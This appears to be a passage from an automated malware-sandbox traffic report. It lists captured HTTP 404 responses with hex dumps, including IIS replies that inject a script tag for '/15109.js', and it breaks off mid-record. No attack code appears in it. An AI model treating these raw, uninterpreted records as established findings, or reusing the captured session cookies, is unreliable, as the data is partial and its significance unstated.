Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Length: 80Content-Type: text/html; Charset=gb2312Server: Microsoft-IIS/7.5Set-Cookie: ASPSESSIONIDSADQDCCQ=KLFAOJLDIIBEJPOFLJFDPJIM; path=/X-Powered-By: ASP.NETDate: Mon, 20 Mar 2023 14:01:56 GMTConnection: closeData Raw: 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 31 35 31 30 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e Data Ascii: <script language="javascript" type="text/javascript" src="/15109.js"></script>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Length: 80Content-Type: text/html; Charset=gb2312Server: Microsoft-IIS/7.5Set-Cookie: ASPSESSIONIDSADQDCCQ=MLFAOJLDPKKCNCDLACPAAGOI; path=/X-Powered-By: ASP.NETDate: Mon, 20 Mar 2023 14:01:59 GMTConnection: closeData Raw: 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 31 35 31 30 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e Data Ascii: <script language="javascript" type="text/javascript" src="/15109.js"></script>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:02:08 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:02:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:02:13 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 14:02:16 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Mon, 20 Mar 2023 14:02:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 06 Feb 2023 15:44:30 GMTETag: W/"6f-5f409e82bbe87"Content-Encoding: gzipData Raw: 36 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 f1 08 f1 f5 b1 b3 f1 70 75 74 b1 b3 09 f1 0c f1 71 b5 33 31 30 d1 cd cb 2f 51 48 cb 2f cd 4b b1 d1 87 08 da e8 43 94 38 f9 bb 44 02 95 1b da b9 16 15 e5 17 29 e4 27 27 97 16 15 a5 a6 58 29 00 75 29 e8 2a 20 e9 03 aa b1 f1 08 b2 b3 d1 87 68 d1 07 5b 04 00 16 77 99 ec 6f 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 68putq310/QH/KC8D)''X)u)* h[wo0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Mon, 20 Mar 2023 14:02:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 06 Feb 2023 15:44:30 GMTETag: W/"6f-5f409e82bbe87"Content-Encoding: gzipData Raw: 36 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 f1 08 f1 f5 b1 b3 f1 70 75 74 b1 b3 09 f1 0c f1 71 b5 33 31 30 d1 cd cb 2f 51 48 cb 2f cd 4b b1 d1 87 08 da e8 43 94 38 f9 bb 44 02 95 1b da b9 16 15 e5 17 29 e4 27 27 97 16 15 a5 a6 58 29 00 75 29 e8 2a 20 e9 03 aa b1 f1 08 b2 b3 d1 87 68 d1 07 5b 04 00 16 77 99 ec 6f 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 68putq310/QH/KC8D)''X)u)* h[wo0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Mon, 20 Mar 2023 14:02:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Mon, 06 Feb 2023 15:44:30 GMTETag: W/"6f-5f409e82bbe87"Content-Encoding: gzipData Raw: 36 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 f1 08 f1 f5 b1 b3 f1 70 75 74 b1 b3 09 f1 0c f1 71 b5 33 31 30 d1 cd cb 2f 51 48 cb 2f cd 4b b1 d1 87 08 da e8 43 94 38 f9 bb 44 02 95 1b da b9 16 15 e5 17 29 e4 27 27 97 16 15 a5 a6 58 29 00 75 29 e8 2a 20 e9 03 aa b1 f1 08 b2 b3 d1 87 68 d1 07 5b 04 00 16 77 99 ec 6f 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 68putq310/QH/KC8D)''X)u)* h[wo0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Mon, 20 Mar 2023 14:02:29 GMTContent-Type: text/htmlContent-Length: 111Connection: closeVary: Accept-EncodingLast-Modified: Mon, 06 Feb 2023 15:44:30 GMTETag: "6f-5f409e82bbe87"Accept-Ranges: bytesData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 2d 6e 6f 74 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 48 31 3e 45 72 72 6f 72 20 6f 63 63 75 72 72 65 64 3a 20 34 30 34 20 2d 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 48 31 3e 3c 48 52 3e 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e Data Ascii: <HTML><HEAD><TITLE>404-not found</TITLE></HEAD><BODY><H1>Error occurred: 404 - not found</H1><HR></BODY></HTML>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:02:34 GMTServer: ApacheContent-Length: 690Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:02:37 GMTServer: ApacheContent-Length: 690Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:02:41 GMTServer: ApacheContent-Length: 690Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:02:43 GMTServer: ApacheContent-Length: 690Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 69 73 65 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6f 76 65 72 6c 61 79 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 72 6d 69 6e 61 6c 22 3e 0a 20 20 3c 68 31 3e 45 72 72 6f 72 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 3c 2f 68 31 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 50 6c 65 61 73 65 20 74 72 79 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 23 31 22 3e 67 6f 20 62 61 63 6b 3c 2f 61 3e 20 6f 72 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 72 65 74 75 72 6e 20 74 6f 20 74 68 65 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 6f 75 74 70 75 74 22 3e 47 6f 6f 64 20 6c 75 63 6b 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/404style.css"></head><body><div class="noise"></div><div class="overlay"></div><div class="terminal"> <h1>Error <span class="errorcode">404</span></h1> <p class="output">The page you are looking for might have been removed, had its name changed or is temporarily unavailable.</p> <p class="output">Please try to <a href="#1">go back</a> or <a href="/">return to the homepage</a>.</p> <p class="output">Good luck.</p></div> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:02:57 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeset-cookie: store_session=6rpf011lk81le4ortol3cdeomh; expires=Mon, 20-Mar-2023 15:02:57 GMT; Max-Age=3600; path=/; SameSite=Laxvary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lN16ox%2Br5XXRwXIdYsLBGGqkexPuhL%2FST9Uig%2BPVl%2FqqoTesqqNrBHCmrEVF03eUkdKlpXjZXTQ1lixA4L5hud8i0QQ4JYvAR56RP%2FOMIL19c%2FkZcECanHunqDJvCuA7JTQ3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7aae7eeb09f09bec-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 94 93 4d 6b dc 30 10 86 ef fd 15 73 cb 65 d7 8e db a6 14 c7 5d 28 85 92 42 29 a5 b4 b9 8f ad b1 35 ec 58 32 d2 6c bc 6e e9 7f 2f f2 36 c4 c6 e4 10 9d 34 1f 3c f3 6a 5e 54 59 ed e5 f0 0a 00 a0 b2 84 e6 72 9d 43 65 15 3a 7c c7 8e e0 9b 57 f8 ec 4f ce 54 f9 25 fb d4 15 75 5a c6 e9 d4 de 4c 7f 56 99 74 7a 0c 1d bb f2 fa 76 53 19 d0 18 76 5d f9 e6 7a 38 6f ab ad 77 5a 16 af 87 73 5e 64 37 70 47 f2 40 ca 0d ee 3e 06 46 d9 dd 53 30 e8 70 17 d1 c5 7d a4 c0 ed 9a f0 77 15 d9 e2 25 ba d2 e4 7d e4 df 54 be 7d ff 9c b2 fd 48 dc 59 2d 9d 0f 3d ca b6 47 d8 d1 de 5e 7a b6 94 b5 ba a8 c1 bb 6e ab d0 70 1c 04 a7 92 dd 4c ab c5 37 c7 ed a4 91 8d da f2 dd cd f3 33 aa 7c 61 56 95 3f d9 5d 25 c7 16 9e da 62 63 bb 2d 16 f5 61 ed f7 4f 4b 30 a4 fe c9 9f 00 03 81 78 7f 64 d7 41 eb 03 34 fe 24 06 9c 57 a8 09 da 04 cb e0 93 a5 e6 08 6a 09 d0 98 40 31 42 8d 61 85 54 0f e4 e2 29 cc cc 00 bf 7e 7c 05 8e 10 07 12 21 03 8d 0f 81 1a 95 29 83 2f 2d a0 08 90 44 82 16 59 e2 6e 56 d1 a0 5b f1 1e 38 b2 42 42 59 df ff 57 8b 3a 4b 10 76 47 a8 49 fc 98 2d 36 b5 78 62 85 60 03 b5 1f ae ac ea 50 e6 f9 38 8e 59 8f 67 8b 6c 34 6b 7c 9f 5f 1d ee 67 7c a2 dd 25 7c 5a 5e 95 e3 e3 a2 2f db ad f2 f9 ab fd 03 00 00 ff ff 0d 0a Data Ascii: 197Mk0se](B)5X2ln/64<j^TYrCe:|WOT%uZLVtzvSv]z8owZs^d7pG@>FS0p}w%}T}HY-=G^znpL73|aV?]%bc-aOK0xdA4$Wj@1BaT)~|!)/-DYnV[8BBYW:KvGI-6xb`P8Ygl4k|_g|%|Z^/
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 14:02:59 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeset-cookie: store_session=b5ubg1pimmrtda13odvh5k1djt; expires=Mon, 20-Mar-2023 15:02:59 GMT; Max-Age=3600; path=/; SameSite=Laxvary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FZpWqdXl%2B95dX86fsW%2FbnEPwyHo2woLiBMqaCY75qhm2Ln%2BUZDk58feMO70UrTy1NzAEWmnFCwS%2B5xHVfZkv1uK%2FQP%2FmfaG23RFfiTMBRirhVCLpiQrR5p8U7k8oSJE%2BnfXC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: 